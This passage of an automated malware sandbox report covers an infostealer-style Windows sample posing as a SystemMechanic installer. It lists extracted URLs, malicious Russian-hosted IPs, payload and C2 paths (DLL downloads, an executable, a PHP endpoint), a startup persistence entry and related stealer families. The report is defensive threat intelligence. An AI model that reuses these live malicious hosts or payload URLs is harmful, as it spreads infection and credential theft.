                                                                                  https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alertsSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 0000000D.00000002.2980273016.0000000002411000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://indiantypefoundry.comSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3056804511.0000020EEFEA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://download.avira.com/download/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModelSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024422327.0000020EEB3A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                          high
                                                                                          http://dejavu.sourceforge.netSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.mozilla.com/en-US/blocklist/u5qk.0.exe, u5qk.0.exe, 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                              high
                                                                                              https://rt.services.visualstudio.com/PtrSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.iolo.com/company/legal/privacy/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://dc.services.visualstudio.com/XSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefenseSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://rt.services.visualstudio.com/pSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://profiler.monitor.azure.com/PtrSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://rt.services.visualstudio.com/lSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016u5qk.0.exe, 00000001.00000003.1902115702.00000000246FD000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                              high
                                                                                                              http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnectionrun.exe, run.exe, 00000003.00000002.1992656537.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000003.00000000.1907137804.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000E.00000002.2294114402.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000E.00000000.2231681830.0000000000D3C000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                high
                                                                                                                https://pastebin.com/raw/z9pYkqPQPOMSBuild.exe, 00000012.00000002.2537639959.00000000029C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.ecosia.org/newtab/MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.symauth.com/cps0(run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://snapshot.monitor.azure.com/pSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bru5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFontsSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666BSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://dc.services.visualstudio.com/fSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://profiler.monitor.azure.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.symauth.com/rpa00run.exe, 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.newtonsoft.com/jsonschemaSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.info-zip.org/run.exe, 00000003.00000002.1994802884.0000000003DD9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324902407.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2322322233.0000000003979000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524262276.0000000004BEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-u5qk.3.exe, 00000009.00000003.2489838469.00000000027F4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://westus2-2.in.applicationinsights.azure.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.iolo.com/company/legal/eula/?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://185.172.128.76u5qk.0.exe, 00000001.00000002.2492933650.0000000004054000.00000040.00000020.00020000.00000000.sdmptrue
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://dejavu.sourceforge.net/wiki/index.php/LicenseSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://185.172.128.76/15f649199f40275b/nss3.dllgu5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://scripts.sil.org/OFLThisSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://scripts.sil.org/OFLinsSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3020284753.0000020EE90C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFu5qk.0.exe, 00000001.00000003.2284077697.000000002A91C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/itfoundry/Poppins)&&&&zSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://github.com/itfoundry/Poppins)SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3025984320.0000020EEB490000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://snapshot.monitor.azure.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://westus2-2.in.applicationinsights.azure.comSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E803E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://github.com/itfoundry/Poppins)&&&&vSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://github.com/itfoundry/Poppins)5SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3025984320.0000020EEB490000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://ocsp.sectigo.com0VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://185.172.128.76/15f649199f40275b/nss3.dll2u5qk.0.exe, 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://www.iolo.com/company/legal/eula/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.newtonsoft.com/jsonSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://westus2-2.in.applicationinsights.azure.com/v2/trackSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://duckduckgo.com/chrome_newtabSMSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17u5qk.0.exe, 00000001.00000003.1902115702.00000000246FD000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://185.172.128.76/15f649199f40275b/softokn3.dllSu5qk.0.exe, 00000001.00000002.2493025545.00000000040C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://google.comVucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp, u5qk.3.exe, 00000009.00000000.2186967041.000000000041C000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://dc.services.visualstudio.com/v2/trackSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://185.172.128.203/tiktok.exe00u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            http://www.codeplex.com/prismSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://taskscheduler.codeplex.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://185.172.128.76/3cd2b41cbde8fc9c.php9bc63c5c878de6304643d64e61fb8releaseccbd010d5db7d1a32561c9u5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.monSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80001000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2976971378.0000020E80239000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://compositewpf.codeplex.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMSBuild.exe, 0000000D.00000002.2980273016.0000000002508000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.0000000002991000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.000000000253F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.2980273016.00000000025A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://sectigo.com/CPS0DVucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitorSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exeu5qk.0.exe, 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/LicSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://185.172.128.76Zu5qk.0.exe, 00000001.00000002.2492933650.0000000004054000.00000040.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            low
                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                            185.172.128.90
                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                            50916NADYMSS-ASRUtrue
                                                                                                                                                                                            185.172.128.228
                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                            50916NADYMSS-ASRUfalse
                                                                                                                                                                                            185.172.128.203
                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                            50916NADYMSS-ASRUfalse
                                                                                                                                                                                            20.157.87.45
                                                                                                                                                                                            svc.iolo.comUnited States
                                                                                                                                                                                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                            91.215.85.66
                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                            34665PINDC-ASRUtrue
                                                                                                                                                                                            185.172.128.76
                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                            50916NADYMSS-ASRUtrue
                                                                                                                                                                                            176.97.76.106
                                                                                                                                                                                            note.padd.cn.comUnited Kingdom
                                                                                                                                                                                            43658INTRAFFIC-ASUAfalse
                                                                                                                                                                                            185.172.128.59
                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                            50916NADYMSS-ASRUfalse
                                                                                                                                                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                            Analysis ID:1432419
                                                                                                                                                                                            Start date and time:2024-04-27 01:30:11 +02:00
                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                            Overall analysis duration:0h 13m 14s
                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                            Report type:full
                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                            Number of analysed new started processes analysed:26
                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                            Technologies:
                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                            Sample name:VucRf0jboS.exe
                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                            Original Sample Name:5cd97a765e0c9463f57769117db519fa.exe
                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                            Classification:mal100.troj.spyw.expl.evad.winEXE@27/63@5/8
                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                            • Successful, ratio: 85%
                                                                                                                                                                                            • Number of executed functions: 113
                                                                                                                                                                                            • Number of non-executed functions: 248
                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.165.165.26, 104.102.251.89, 104.102.251.57, 13.95.31.18, 192.229.211.108, 20.242.39.171, 20.190.152.19, 40.126.24.149, 40.126.24.148, 20.190.152.22, 40.126.24.147, 20.190.152.21, 40.126.24.84, 40.126.24.83, 52.182.143.212, 52.168.117.173, 23.51.58.94, 20.9.155.150
                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, gig-ai-prod-westus2-0.trafficmanager.net, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, gig-ai-prod-wus2-02-app-v4-tag.westus2.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                            • VT rate limit hit for: VucRf0jboS.exe
                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                            00:31:50AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk
                                                                                                                                                                                            01:32:12API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                            01:32:13API Interceptor1679x Sleep call for process: MSBuild.exe modified
                                                                                                                                                                                            01:32:14API Interceptor1x Sleep call for process: cmd.exe modified
                                                                                                                                                                                            01:32:31API Interceptor7x Sleep call for process: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe modified
                                                                                                                                                                                            01:33:07API Interceptor8x Sleep call for process: FBAKEHIEBK.exe modified
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            185.172.128.90kO1P1YnLst.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
